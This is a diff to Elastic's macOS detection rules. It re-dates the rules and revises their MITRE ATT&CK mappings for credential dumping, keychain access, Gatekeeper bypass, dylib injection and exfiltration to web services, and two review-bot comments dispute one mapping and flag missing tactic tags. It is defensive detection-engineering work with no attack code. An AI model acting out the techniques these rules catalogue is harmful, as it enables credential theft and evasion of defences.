@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,12 +85,30 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" - [[rule.threat.technique]] - name = "Non-Standard Port" - id = "T1571" - reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml index 9a0859fd9b0..1fbe462cdbd 100644 --- a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml +++ b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -188,11 +188,43 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.003" +name = "Exfiltration to Text Storage Sites" +reference = "https://attack.mitre.org/techniques/T1567/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.004" +name = "Exfiltration Over Webhook" +reference = "https://attack.mitre.org/techniques/T1567/004/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml index 11e5309dca4..f3f8506634b 100644 --- a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml +++ b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,14 +100,18 @@ In macOS environments, built-in commands like `defaults` and `mkpassdb` can be e [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml index 8cf8dad2102..113d70f61fe 100644 --- a/rules/macos/credential_access_high_volume_of_pbpaste.toml +++ b/rules/macos/credential_access_high_volume_of_pbpaste.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.investigate]] @@ -108,14 +108,26 @@ sequence by host.hostname, host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1115" +name = "Clipboard Data" +reference = "https://attack.mitre.org/techniques/T1115/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index e566cdb00e5..3c279360921 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml 
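Review bot: The added sub-technique `T1003.008` (`/etc/passwd and /etc/shadow`) does not match what this rule observes: the hunk's own description context says the rule is about the macOS built-ins `defaults` and `mkpassdb`, and on macOS local account password hashes are held in the Directory Services local node rather than in `/etc/shadow`. Unless the query also covers reads of those files (the query is outside this hunk), the parent `T1003` alone is the accurate mapping and the `T1003.008` block should be removed.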
@@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,6 +101,7 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -110,15 +111,18 @@ reference = "https://attack.mitre.org/techniques/T1003/" id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.005" +name = "Ccache Files" +reference = "https://attack.mitre.org/techniques/T1558/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index d1bc68892c1..938f9779c37 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -107,29 +107,23 @@ Keychain is macOS's secure storage system for managing user credentials, includi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" - -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" reference = "https://attack.mitre.org/techniques/T1555/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 356443d7e15..dadd11cd20e 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,14 +103,31 @@ Web proxy settings in macOS manage how web traffic is routed, often used to enha
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1539"
 name = "Steal Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1539/"
+[[rule.threat.technique]]
+id = "T1557"
+name = "Adversary-in-the-Middle"
+reference = "https://attack.mitre.org/techniques/T1557/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1557"
+name = "Adversary-in-the-Middle"
+reference = "https://attack.mitre.org/techniques/T1557/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml
index 87666419b43..15af0dc3469 100644
--- a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml
+++ b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/16"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
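Review bot: The second `[[rule.threat]]` entry gives this rule a tactic it did not carry before (`TA0009` / `Collection`), but the hunk does not touch the rule's `tags` array, which sits outside it; in this rule set each mapped tactic is expected to be mirrored by a `Tactic: <name>` tag, so unless another part of this patch adds `"Tactic: Collection"` the tags and the threat mapping will drift apart. Please confirm the `tags` line of each affected rule is updated in the same change. The same check applies to every other rule in this chunk that gains a new tactic: credential_access_potential_macos_ssh_bruteforce.toml (`Initial Access`), credential_access_promt_for_pwd_via_osascript.toml and defense_evasion_gatekeeper_override_and_execution.toml (`Execution`), credential_access_suspicious_web_browser_sensitive_file_access.toml, credential_access_systemkey_dumping.toml, defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml and defense_evasion_tcc_bypass_mounted_apfs_access.toml (`Collection`), defense_evasion_dylib_injection_via_env_vars.toml, defense_evasion_suspicious_tcc_access_granted.toml and discovery_full_disk_access_check.toml (`Privilege Escalation`), and discovery_suspicious_sip_check.toml (`Defense Evasion`).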
@@ -97,17 +97,29 @@ SSH (Secure Shell) is a protocol used to securely access remote systems. On macO
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.threshold]
 field = ["host.id"]
 value = 20
diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
index 24d5fa1fbd2..4cfbb25cd96 100644
--- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
+++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/16"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -112,19 +112,36 @@ OSASCRIPT is a macOS utility that allows the execution of AppleScript and other
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1056"
 name = "Input Capture"
 reference = "https://attack.mitre.org/techniques/T1056/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1056.002"
 name = "GUI Input Capture"
 reference = "https://attack.mitre.org/techniques/T1056/002/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml
index 26ee109c54d..7a1234c88ea 100644
--- a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml
+++ b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -73,20 +73,46 @@ process.name:python*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1539"
+name = "Steal Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1539/"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.001"
 name = "Keychain"
 reference = "https://attack.mitre.org/techniques/T1555/001/"
+[[rule.threat.technique]]
+id = "T1558"
+name = "Steal or Forge Kerberos Tickets"
+reference = "https://attack.mitre.org/techniques/T1558/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1558.005"
+name = "Ccache Files"
+reference = "https://attack.mitre.org/techniques/T1558/005/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "file.path"]
diff --git a/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml b/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml
index 9bc52f1784b..535d1743a39 100644
--- a/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml
+++ b/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -105,6 +105,7 @@ Web browsers store sensitive data like cookies and login credentials in specific
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1539"
 name = "Steal Web Session Cookie"
@@ -114,15 +115,26 @@ reference = "https://attack.mitre.org/techniques/T1539/"
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.003"
 name = "Credentials from Web Browsers"
 reference = "https://attack.mitre.org/techniques/T1555/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/macos/credential_access_systemkey_dumping.toml b/rules/macos/credential_access_systemkey_dumping.toml
index 0ce7fb22576..1f86c92819d 100644
--- a/rules/macos/credential_access_systemkey_dumping.toml
+++ b/rules/macos/credential_access_systemkey_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -99,19 +99,31 @@ macOS keychains securely store user credentials, including passwords and certifi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.001"
 name = "Keychain"
 reference = "https://attack.mitre.org/techniques/T1555/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml
index 744d460b16f..379b50eb32c 100644
--- a/rules/macos/defense_evasion_apple_softupdates_modification.toml
+++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/15"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -99,19 +99,23 @@ In macOS environments, the SoftwareUpdate preferences manage system updates, cru
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique]]
+id = "T1647"
+name = "Plist File Modification"
+reference = "https://attack.mitre.org/techniques/T1647/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml
index 2a5331cde71..5f07e83525a 100644
--- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml
+++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -107,19 +107,28 @@ In macOS, files downloaded from the internet are tagged with a quarantine attrib
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1553"
+name = "Subvert Trust Controls"
+reference = "https://attack.mitre.org/techniques/T1553/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1553.001"
+name = "Gatekeeper Bypass"
+reference = "https://attack.mitre.org/techniques/T1553/001/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml
index d56533056a0..c5a7587ca5d 100644
--- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml
+++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/11"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -102,14 +102,18 @@ Gatekeeper is a macOS security feature that ensures only trusted software runs b
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1553"
 name = "Subvert Trust Controls"
 reference = "https://attack.mitre.org/techniques/T1553/"
+[[rule.threat.technique.subtechnique]]
+id = "T1553.001"
+name = "Gatekeeper Bypass"
+reference = "https://attack.mitre.org/techniques/T1553/001/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml b/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml
index 65c5732f957..115d5925383 100644
--- a/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml
+++ b/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/30"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -89,35 +89,53 @@ sequence by process.entity_id with maxspan=15s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Persistence"
- id = "TA0003"
- reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml
index 026222507de..4293e385f82 100644
--- a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml
+++ b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/03"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -76,27 +76,45 @@ configuration where host.os.type == "macos" and event.action == "gatekeeper_over
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
-
- [[rule.threat.technique]]
- name = "Impair Defenses"
- id = "T1562"
- reference = "https://attack.mitre.org/techniques/T1562/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Disable or Modify Tools"
- id = "T1562.001"
- reference = "https://attack.mitre.org/techniques/T1562/001/"
-
- [[rule.threat.technique]]
- name = "Subvert Trust Controls"
- id = "T1553"
- reference = "https://attack.mitre.org/techniques/T1553/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Gatekeeper Bypass"
- id = "T1553.001"
- reference = "https://attack.mitre.org/techniques/T1553/001/"
+[[rule.threat.technique]]
+id = "T1553"
+name = "Subvert Trust Controls"
+reference = "https://attack.mitre.org/techniques/T1553/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1553.001"
+name = "Gatekeeper Bypass"
+reference = "https://attack.mitre.org/techniques/T1553/001/"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml
index cc25b452be3..72328ff7eeb 100644
--- a/rules/macos/defense_evasion_modify_environment_launchctl.toml
+++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -102,19 +102,23 @@ Environment variables in macOS are crucial for configuring system and applicatio
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1574.007"
 name = "Path Interception by PATH Environment Variable"
 reference = "https://attack.mitre.org/techniques/T1574/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml
index 142f83f0d06..e6df1d7b6bc 100644
--- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml
+++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -104,19 +104,28 @@ The Transparency, Consent, and Control (TCC) database in macOS manages app permi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.006"
+name = "TCC Manipulation"
+reference = "https://attack.mitre.org/techniques/T1548/006/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml
index edcdf2e9347..cd78d6ab68b 100644
--- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml
+++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/11"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -105,26 +105,39 @@ Secure Copy Protocol (SCP) is used for secure file transfers over SSH. On macOS,
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
